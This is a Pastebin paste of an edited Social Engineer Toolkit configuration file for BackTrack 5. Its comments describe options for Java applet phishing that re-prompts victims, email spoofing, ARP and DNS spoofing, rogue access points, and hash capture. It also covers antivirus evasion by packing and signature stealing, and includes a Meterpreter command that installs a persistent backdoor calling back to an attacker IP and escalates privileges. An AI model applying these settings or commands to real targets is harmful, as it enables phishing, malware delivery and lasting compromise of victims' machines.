API tools faq
paste
Advertisement
zegige

bt5_exploit_edit

zegige
Nov 15th, 2011
116
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.01 KB | None | 0 0
raw download clone embed print report
  1. ##################################################################################################
  2. ##################################################################################################
  3. ##            ##
  4. ## The following config file will allow you to customize settings within   ##
  5. ## the Social Engineer Toolkit. The lines that do not have comment code    ##
  6. ## ("#") are the fields you want to toy with. They are pretty easy to    ##
  7. ## understand.           ##
  8. ##            ##
  9. ## The Metasploit path is the default path for where Metasploit is located.   ##
  10. ## Metasploit is required for SET to function properly.      ##
  11. ##            ##
  12. ## The ETTERCAP function specifies if you want to use ARP Cache poisoning in   ##
  13. ## conjunction with the web attacks, note that ARP Cache poisoning is only   ##
  14. ## for internal subnets only and does not work against people on the internet.   ##
  15. ##            ##
  16. ## The SENDMAIL option allows you to spoof source IP addresses utilizing an   ##
  17. ## application called SendMail. Sendmail is NOT installed by default on BackTrack5.  ##
  18. ## To spoof email addresses when performing the mass email attacks, you must    ##
  19. ## install Sendmail manually using: apt-get install sendmail     ##
  20. ##            ##
  21. ## Note that ETTERCAP and SENDMAIL flags only accept ON or OFF switches.   ##
  22. ##            ##
  23. ## Note that the Metasploit_PATH cannot have a / after the folder name.    ##
  24. ##            ##
  25. ## There are additional options, read the comments for additional descriptions.          ##
  26. ##                   ##
  27. ##################################################################################################
  28. ##################################################################################################
  29. #
  30. # DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
  31. METASPLOIT_PATH=/opt/framework3/msf3
  32. #
  33. # DEFINE TO USE ETTERCAP OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF
  34. ETTERCAP=OFF
  35. #
  36. # SPECIFY WHAT INTERFACE YOU WANT ETTERCAP OR DSNIFF TO LISTEN ON, IF NOTHING WILL DEFAULT
  37. # EXAMPLE: ETTERCAP_INTERFACE=wlan0
  38. ETTERCAP_DSNIFF_INTERFACE=eth0
  39. #
  40. # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
  41. ETTERCAP_PATH=/usr/share/ettercap
  42. #
  43. # DEFINE TO USE DSNIFF OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF
  44. # IF DSNIFF IS SET TO ON, ETTERCAP WILL AUTOMATICALLY BE DISABLED.
  45. DSNIFF=OFF
  46. #
  47. # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
  48. SENDMAIL=OFF
  49. #
  50. # SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
  51. WEBATTACK_EMAIL=OFF
  52. #
  53. # CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
  54. # INSTALL --->  JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
  55. # IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
  56. SELF_SIGNED_APPLET=OFF
  57. #
  58. # THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFERENT.
  59. # THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION
  60. JAVA_ID_PARAM=Secure Java Applet
  61. #
  62. # JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA APPLET IF
  63. # THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. THIS GIVES
  64. # A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK
  65. JAVA_REPEATER=ON
  66. #
  67. # JAVA REPEATER TIMING WHICH IS THE DELAY IT TAKES BETWEEN THE USER HITTING CANCEL TO
  68. # WHEN THE NEXT JAVA APPLET RUNS. BE CAREFUL SETTING TO LOW AS IT WILL SPAWM THEM OVER
  69. # AND OVER EVEN IF THEY HIT RUN. 200 EQUALS 2 SECONDS.
  70. JAVA_TIME=200
  71. #
  72. # AUTO DETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
  73. # SET TO AUTODETECT YOUR INTERFACE
  74. AUTO_DETECT=OFF
  75. #
  76. # SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
  77. # OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
  78. WEB_PORT=80
  79. #
  80. # CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
  81. # DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
  82. # YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
  83. CUSTOM_EXE=legit.binary
  84. #
  85. # MAN LEFT IN THE MIDDLE PORT, THIS WILL BE USED FOR THE WEB SERVER BIND PORT
  86. MLITM_PORT=80
  87. #
  88. # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
  89. # THE ATTACK VECTOR
  90. APACHE_SERVER=OFF
  91. #
  92. # PATH TO THE APACHE WEBROOT
  93. APACHE_DIRECTORY=/var/www
  94. #
  95. # TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
  96. WEBATTACK_SSL=OFF
  97. #
  98. # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
  99. # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
  100. # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! TO TURN THIS ON TURN SELF_SIGNED_CERT
  101. # TO THE ON POSITION.
  102. #
  103. SELF_SIGNED_CERT=OFF
  104. #
  105. # BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
  106. # SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
  107. PEM_CLIENT=/root/newcert.pem
  108. PEM_SERVER=/root/newreq.pem
  109. #
  110. # TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
  111. # AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
  112. WEBJACKING_TIME=2000
  113. #
  114. # PORT FOR THE COMMAND CENTER
  115. COMMAND_CENTER_PORT=44444
  116. #
  117. # COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST ONLY. IF YOU WANT TO ENABLE IT
  118. # SO YOU CAN HIT THE COMMAND CENTER REMOTELY PUT THE INTERFACE TO 0.0.0.0 TO BIND TO ALL INTERFACES.
  119. COMMAND_CENTER_INTERFACE=127.0.0.1
  120. #
  121. # HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLOIT ENCODING OPTIONS
  122. ENCOUNT=4
  123. #
  124. # WHAT DO YOU WANT TO USE FOR YOUR DEFAULT TERMINAL WITHIN THE COMMAND CENTER. THE DEFAULT IS XTERM
  125. # THE OPTIONS YOU HAVE ARE AS FOLLOW - GNOME, KONSOLE, XTERM, SOLO. IF YOU SELECT SOLO IT WILL PLACE
  126. # ALL RESULTS IN THE SAME SHELL YOU USED TO OPEN THE SET-WEB INTERFACE. THIS IS USEFUL IF YOUR USING
  127. # SOMETHING THAT ONLY HAS ONE CONSOLE, LETS SAY A IPHONE OR IPAD.
  128. TERMINAL=SOLO
  129. #
  130. # IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO
  131. # NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES
  132. # THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING.
  133. AUTO_MIGRATE=OFF
  134. #
  135. # DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON MODULES LOADED
  136. # FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE TURNING
  137. # THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION
  138. DIGITAL_SIGNATURE_STEAL=ON
  139. #
  140. # THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND AUTOMATICALLY ATTEMPT
  141. # TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE BETTER.
  142. UPX_ENCODE=ON
  143. UPX_PATH=/usr/bin/upx
  144. #
  145. # HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS
  146. # MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE
  147. # PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON
  148. # THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPERATE THE COMMANDS BY A ;
  149. METERPRETER_MULTI_SCRIPT=OFF
  150. #
  151. # WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED.
  152. # BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPERATE WITH A ;. FOR EXAMPLE YOU COULD DO
  153. # run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS
  154. METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
  155. #
  156. # THIS IS THE PORT THAT IS USED FOR THE IFRAME INJECTION USING THE METASPLOIT BROWSER ATTACKS
  157. # BY DEFAULT THIS PORT IS 8080 HOWEVER EGRESS FILTERING MAY BLOCK THIS. MAY WANT TO ADJUST TO
  158. # SOMETHING LIKE 21 OR 53
  159. METASPLOIT_IFRAME_PORT=8080
  160. #
  161. # THIS FEATURE WILL TURN ON OR OFF THE AUTOMATIC REDIRECTION. BY DEFAULT FOR EXAMPLE IN MULTI-ATTACK
  162. # THE SITE WILL REDIRECT ONCE ONE SUCCESSFUL ATTACK IS USED. SOME PEOPLE MAY WANT TO USE JAVA APPLET
  163. # AND CREDENTIAL HARVESTER FOR EXAMPLE.
  164. AUTO_REDIRECT=ON
  165. #
  166. # THIS FEATURE WILL AUTO EMBED A IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE.
  167. # USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN
  168. # IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL BE INITIATED
  169. # AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES.
  170. UNC_EMBED=OFF
  171. #
  172. # THIS FEATURE WILL ATTEMPT TO TURN CREATE A ROGUE ACCESS POINT AND REDIRECT VICTIMS BACK TO THE
  173. # SET WEB SERVER WHEN ASSOCIATED. AIRBASE-NG and DNSSPOOF.
  174. ACCESS_POINT_SSID=linksys
  175. AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
  176. DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
  177. #
  178. # EMAIL PROVIDER LIST SUPPORTS GMAIL, HOTMAIL, AND YAHOO. SIMPLY CHANGE THE IT TO THE PROVIDER YOU WANT TO
  179. # USE.
  180. EMAIL_PROVIDER=GMAIL
  181. #
  182. # THIS WILL CONFIGURE THE DEFAULT CHANNEL THAT THE WIRELESS ACCESS POINT ATTACK BROADCASTS ON THROUGH WIFI
  183. # COMMUNICATIONS.
  184. AP_CHANNEL=9
  185. #
  186. # THIS WILL REMOVE THE SET INTERACTIVE SHELL FROM THE MENU SELECTION. THE SET PAYLOADS ARE LARGE IN NATURE
  187. # AND THINGS LIKE THE PWNIEXPRESS NEED SMALLER SET BUILDS
  188. SET_INTERACTIVE_SHELL=ON
  189. #
  190. #############################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!